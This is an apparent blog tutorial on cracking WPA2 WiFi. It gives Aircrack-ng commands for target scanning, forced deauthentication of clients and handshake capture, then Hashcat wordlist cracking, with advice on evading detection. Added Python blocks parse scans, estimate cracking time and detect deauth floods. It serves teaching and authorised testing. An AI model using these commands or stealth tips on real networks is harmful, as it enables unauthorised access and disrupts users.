
WiFi Penetration Testing with Aircrack-ng

By Xavier Collantes

10/22/2025


Disclaimer

This article is for educational purposes only. WiFi penetration testing should only be performed on networks you own or have explicit written authorization to test.

If you found this useful, consider giving my article a LIKE before the police take you away.

In this article, we will walk through WiFi penetration testing, using mainly the Aircrack-ng suite and Hashcat, to capture a WPA2 4-way handshake and get into a WiFi network. In a real engagement you would need access to the network first before moving on to further attacks such as WiFi phishing, fake access points, and more.
Process:
  1. Capture the 4-way handshake using Airmon-ng and Airodump-ng
  2. Crack the password offline using Aircrack-ng and Hashcat
  3. Infiltrate the network with found WiFi password
I may use the following terms interchangeably:
  • AP = Access Point = Network = (the WiFi router in non-technical terms)
  • BSSID = Basic Service Set Identifier = MAC address of the Access Point
  • SSID = Service Set Identifier = Network name

Understanding WiFi Security Protocols

WPS: The Obsolete Protocol (~2006-2015)

WiFi Protected Setup (WPS) was designed for convenience but introduced critical vulnerabilities. An 8-digit PIN is used for quick access between devices on the same network. The 8-digit PIN can be easily brute-forced, making it obsolete for secure networks.
Tools: Aircrack-ng, Reaver
Countermeasure: Disable WPS on all access points.

While WPS is rarely used today, always scan for it during reconnaissance. Legacy networks may still have it enabled.

WPA2: The Current Standard (~2007-present)

WPA2 remains the most common protocol in most WiFi networks today.

The attack vector we will discuss is capturing the WPA2 4-way handshake that occurs during authentication, then cracking it offline.

WPA3: The Future

WPA3 offers improved security but can be vulnerable to downgrade attacks, forcing networks back to WPA2.
Where WPA3 is better than WPA2:
  • Each device connected to the network has a unique key; WPA2 uses the same key for all devices
  • Advanced Encryption Standard (AES) in Galois/Counter Mode (GCM) instead of AES-CCMP

Hardware Requirements

Most built-in WiFi adapters cannot perform packet injection or enter monitor mode. External adapters are required.

Regular WiFi cards typically operate in Managed Mode, capturing only packets destined for your MAC address. Penetration testing requires Monitor Mode, which captures all wireless traffic.
Examples:
  • Ralink RT5370 WiFi USB Adapter
  • Alfa AWUS036ACHM 802.11ac WiFi USB Adapter

Adapter Driver Installation

The driver installation may be different for your adapter. Please refer to the adapter's documentation for the correct installation steps.

Download and build the driver.

```bash
git clone https://github.com/lwfinger/rtw88
cd rtw88
make
sudo make install

# Disable Secure Boot if the driver does not load on reboot.
# Verify installation:
ip a  # Should show: loopback (lo), existing WiFi, and the ALFA adapter
```

The Aircrack-ng Suite

Aircrack-ng provides a complete toolkit for WiFi security testing:
  • Pulling network info
  • Listening for packets (passive)
  • Wireless attacks such as force device deauthentication, replay, fake APs (active)
  • Password cracking for WEP, WPA/WPA2/WPA3

Installation

```bash
sudo apt update
sudo apt install aircrack-ng
sudo aircrack-ng -u
```

Reconnaissance Phase

Step 1: Identify Your Network Interface

Find your network interfaces.

```bash
ip a

# For convenience, export your adapter name.
export NETWORK_INTERFACE=wlan1
```

Replace wlan1 with your adapter's name. It can be any name, but it is usually the interface that is neither the loopback (lo) nor your existing built-in WiFi adapter.

Step 2: Enable Monitor Mode

Put the card into monitor mode.

```bash
sudo airmon-ng start $NETWORK_INTERFACE
```

Kill conflicting processes (this will disconnect your WiFi connection).

```bash
sudo airmon-ng check kill
```

sudo airmon-ng check kill shuts down your existing WiFi connections. To restart them later, run the commands for your OS (look them up ahead of time); these are for Debian:

```bash
sudo systemctl restart wpa_supplicant
sudo systemctl restart NetworkManager
```

Enabling monitor mode will disconnect your primary WiFi connection. Consider using a separate device for internet access during testing.

Step 3: Scan for Access Points

Goal: get a list of APs in the area, then focus on a specific AP and identify its BSSID and channel.

Begin scanning all channels.

```bash
sudo airodump-ng -w output/scan $NETWORK_INTERFACE
```
This command channel-hops between channels 1-14 (802.11b/g) to discover access points.
Key Fields:
  • BSSID: MAC address of the access point unique to the AP.
  • PWR: Signal strength.
  • Beacons: Number of beacon frames (indicates signal quality)
  • ENC: Encryption type (OPN, WEP, WPA, WPA2)
  • ESSID: Network name

Parse the CSV output for specific targets.

```bash
head output/scan-01.csv
grep "NAME OF NETWORK" output/scan-01.csv
```
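The scan-01.csv file is two comma-separated tables: the access points, a blank line, then the stations (clients). Here is an added Python parser, not part of the original article, that reads that layout from a constructed sample, reports APs still running OPN, WEP or WPA1-only (the ones an audit should flag first), counts the clients seen per BSSID, and looks up the channel and BSSID of a named network; the column names follow airodump-ng's CSV header and every value in the sample is made up.

```python
import csv
from io import StringIO

# Constructed sample in airodump-ng's <prefix>-01.csv layout: AP table, blank line, station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2025-10-22 14:20:01, 2025-10-22 14:28:40, 6, 54, WPA2, CCMP, PSK, -45, 120, 0, 0. 0. 0. 0, 9, CoffeeLAN,
DE:AD:BE:EF:00:01, 2025-10-22 14:20:05, 2025-10-22 14:28:39, 11, 54, OPN, , , -70, 30, 0, 0. 0. 0. 0, 5, Guest,
DE:AD:BE:EF:00:02, 2025-10-22 14:21:00, 2025-10-22 14:28:10, 1, 11, WEP, WEP, , -80, 15, 2, 0. 0. 0. 0, 6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2025-10-22 14:22:10, 2025-10-22 14:28:40, -50, 40, AA:BB:CC:DD:EE:FF, CoffeeLAN
22:33:44:55:66:77, 2025-10-22 14:23:00, 2025-10-22 14:28:30, -55, 12, AA:BB:CC:DD:EE:FF,
33:44:55:66:77:88, 2025-10-22 14:25:00, 2025-10-22 14:27:00, -60, 3, (not associated), Guest
"""

def parse_airodump_csv(text):
    """Return (access_points, stations): two lists of dicts keyed by the CSV column names."""
    ap_part, _, sta_part = text.strip().partition("\n\n")
    def rows(part):
        # Strip stray whitespace; drop the None key DictReader uses for surplus fields.
        reader = csv.DictReader(StringIO(part), skipinitialspace=True)
        return [{k.strip(): (v or "").strip() for k, v in r.items() if k} for r in reader]
    return rows(ap_part), rows(sta_part)

def weak_access_points(aps):
    """APs that are open, WEP, or WPA1-only, as (BSSID, ESSID, Privacy) tuples."""
    weak = []
    for ap in aps:
        priv = ap["Privacy"]
        wpa1_only = priv.startswith("WPA") and "WPA2" not in priv and "WPA3" not in priv
        if priv in ("OPN", "WEP") or wpa1_only:
            weak.append((ap["BSSID"], ap["ESSID"], priv))
    return weak

def clients_per_ap(stations):
    """Count associated clients per BSSID, ignoring devices that are only probing."""
    counts = {}
    for sta in stations:
        bssid = sta["BSSID"]
        if bssid and not bssid.startswith("("):
            counts[bssid] = counts.get(bssid, 0) + 1
    return counts

def find_ap(aps, essid):
    """Channel and BSSID of a named network: the two values the -c/--bssid flags take."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return int(ap["channel"]), ap["BSSID"]
    return None
```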

Step 4: Lock Onto Target AP

Channel hopping with airodump-ng is only useful for finding APs. To focus on a specific AP, you need to use the --bssid flag.

From experience, you should keep your digital footprint minimal. Don't leave a trail of data behind you. Passive listening is low risk but your risk increases dramatically if you are actively sending packets. Focus on specific targets to keep your digital footprint minimal and save your time.

Once you have identified your target, focus on that single access point:

```bash
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w output/target $NETWORK_INTERFACE

# Example:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w output/target $NETWORK_INTERFACE
```

Capturing the Handshake

This is the hardest and trickiest part in the field, because you need to be close enough to the AP to capture the handshake. You will need to wait until a client device deauthenticates and then reauthenticates to the AP.

Deauthentication attacks are detectable. Many networks employ Intrusion Detection Systems (IDS) that monitor for excessive deauth packets. Use with caution and only when necessary.

There are ways to capture the handshake without forcing deauthentication.

Understanding Deauthentication

Deauth packets are the formal way devices disconnect from access points. However, they are not always sent:
Actions that send deauth:
  • Enabling airplane mode
  • Closing a laptop so it enters sleep mode
  • Shutting down a device
Actions that do not:
  • Walking out of range
  • Sudden power loss

The Stealthy Approach

If you show up to a coffee shop trying to hack their WiFi network dressed like this, you will go to jail.
Best practice: Don't force deauthentication at all. Wait for natural reauthentication events:
  • People arriving and opening laptops
  • Devices reconnecting after being away
  • Natural network activity in busy locations
This maintains stealth and leaves minimal trace.

Forced Deauthentication (When Necessary)

Forced deauthentication is detectable. Many networks employ Intrusion Detection Systems (IDS) that monitor for excessive deauth packets. Please give my blog a LIKE before the police come to your door.

```bash
# Target a specific client device.
# Find connected clients in the bottom section of the airodump-ng output.

sudo aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> $NETWORK_INTERFACE

# Example:
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 $NETWORK_INTERFACE
```

Confirming Handshake Capture

When successful, the airodump-ng status line will show the handshake:

```text
CH  6 ][ Elapsed: 8 mins ][ 2025-10-22 14:30 ][ WPA handshake: AA:BB:CC:DD:EE:FF
```

Verify the capture:

```bash
# Must show "1 handshake"
sudo aircrack-ng output/target-01.cap
```

Offline Password Cracking

Once you have the handshake, you can leave the physical location. Cracking is computationally intensive and best done elsewhere.

Minimize time near the target. Prolonged presence increases detection risk. Gather your capture files and move to a secure location.

Speed Comparison

  • Aircrack-ng (CPU): 500-5,000 keys/sec
  • Hashcat (CPU): 5,000-50,000 keys/sec
  • Hashcat (Single GPU): 100,000-500,000 keys/sec
  • Hashcat (Multiple GPUs): 1,000,000+ keys/sec
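Those rates are low because every candidate passphrase must go through PBKDF2-HMAC-SHA1 with 4096 iterations (the PMK derivation defined in IEEE 802.11i) before it can be checked against the handshake. The following added Python block, not from the article, derives the PMK with the standard library, measures a single-core rate on your own machine, and uses the rates above to estimate how long exhausting a keyspace takes, which is the reasoning behind the 16+ character policy recommended later; the alphabet sizes and rates are inputs you choose.

```python
import hashlib
import time

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) as in IEEE 802.11i.
    32 bytes is two SHA-1 output blocks, so each candidate costs 8192 HMAC-SHA1 calls."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)

def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` characters drawn from `alphabet_size` symbols."""
    return alphabet_size ** length

def years_to_exhaust(alphabet_size: int, length: int, keys_per_sec: float) -> float:
    """Worst-case time to try every passphrase in the keyspace at a given cracking rate."""
    return keyspace(alphabet_size, length) / keys_per_sec / (365 * 24 * 3600)

def measure_rate(ssid: str = "IEEE", candidates: int = 200) -> float:
    """Rough single-core PMK derivations per second on this machine (no MIC check included)."""
    start = time.perf_counter()
    for i in range(candidates):
        wpa2_pmk(f"candidate{i:06d}", ssid)
    return candidates / (time.perf_counter() - start)

if __name__ == "__main__":
    # Known-answer vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
    print(wpa2_pmk("password", "IEEE").hex())
    print(f"this machine: {measure_rate():,.0f} PMK/s")
    for length in (8, 12, 16):
        # 62 = a-z, A-Z, 0-9; the two rates are taken from the comparison above.
        for label, rate in (("Aircrack-ng CPU", 5_000), ("Hashcat multi-GPU", 1_000_000)):
            print(f"{length:2d} chars, {label:18s}: {years_to_exhaust(62, length, rate):.3g} years")
```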

Using Aircrack-ng (CPU only)

Crack with a wordlist.

```bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> <CAPTURE_FILE>

# Example:
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF output/target-01.cap
```

Using Hashcat with GPU

For significantly faster cracking with GPU acceleration:
```bash
# Install conversion tools
sudo apt install hcxtools -y

# Convert CAP to HC22000 format
hcxpcapngtool -o capture.hc22000 target-01.cap

# Crack with Hashcat
hashcat -m 22000 -w 2 -O capture.hc22000 /usr/share/wordlists/rockyou.txt
```
Hashcat Parameters:
  • -m 22000: Mode for WPA/WPA2
  • -w 2: Workload profile (1=Low, 2=Default, 3=High, 4=Insane)
  • -O: Optimized kernel (requires more memory but faster)

Wordlist Resources

```bash
# Comprehensive WPA2 wordlists
git clone https://github.com/kennyn510/wpa2-wordlists
cd wpa2-wordlists
gunzip *gz
cat *txt >> combined.txt
```

Defensive Recommendations

If you're a network administrator:
  • Disable WPS entirely
  • Use WPA3 where possible
  • Enforce strong password policies (16+ characters)
  • Monitor for deauthentication attacks
  • Regularly audit network access
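One concrete way to monitor for deauthentication attacks, as an added Python example that is not part of the article: a detector keeps a sliding window of deauthentication and disassociation frames per source address and alerts when a source exceeds a burst threshold. It runs here over a constructed frame list containing one legitimate laptop disconnect (a single frame, as in the list of actions that send deauth) and one flood; the addresses, timestamps and threshold are made up, and a real deployment would feed it frames from a monitor-mode capture.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10  # 802.11 management frame subtypes that end an association

class DeauthFloodDetector:
    """Alert when one source address sends >= threshold deauth/disassoc frames within window_s."""

    def __init__(self, window_s=5.0, threshold=20):
        self.window_s = window_s
        self.threshold = threshold
        self.history = defaultdict(deque)  # src MAC -> timestamps of recent deauth/disassoc frames
        self.alerted = set()               # sources already reported, so each flood alerts once

    def observe(self, ts, src, dst, subtype):
        """Feed one management frame (timestamp in seconds); return an alert tuple or None."""
        if subtype not in (DEAUTH, DISASSOC):
            return None
        recent = self.history[src]
        recent.append(ts)
        while recent and ts - recent[0] > self.window_s:
            recent.popleft()
        if len(recent) >= self.threshold and src not in self.alerted:
            self.alerted.add(src)
            return ("DEAUTH_FLOOD", src, dst, len(recent))
        return None

def scan(frames, **kwargs):
    """Run the detector over (ts, src, dst, subtype) tuples and collect the alerts raised."""
    det = DeauthFloodDetector(**kwargs)
    return [alert for alert in (det.observe(*frame) for frame in frames) if alert]

# Constructed traffic: a laptop going to sleep sends a single deauth at t=0; from t=10 a burst
# of frames carries the AP's address toward a phone and the phone's address toward the AP,
# the pattern a forged deauth burst produces since neither side actually sent them.
AP, LAPTOP, PHONE = "AA:BB:CC:DD:EE:FF", "11:22:33:44:55:66", "22:33:44:55:66:77"
FRAMES = [(0.0, LAPTOP, AP, DEAUTH)]
FRAMES += [(10.0 + i * 0.01, AP, PHONE, DEAUTH) for i in range(64)]
FRAMES += [(10.005 + i * 0.01, PHONE, AP, DEAUTH) for i in range(64)]
FRAMES.sort()  # replay in time order, as a live capture would deliver them

if __name__ == "__main__":
    for alert in scan(FRAMES):
        print(alert)
```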
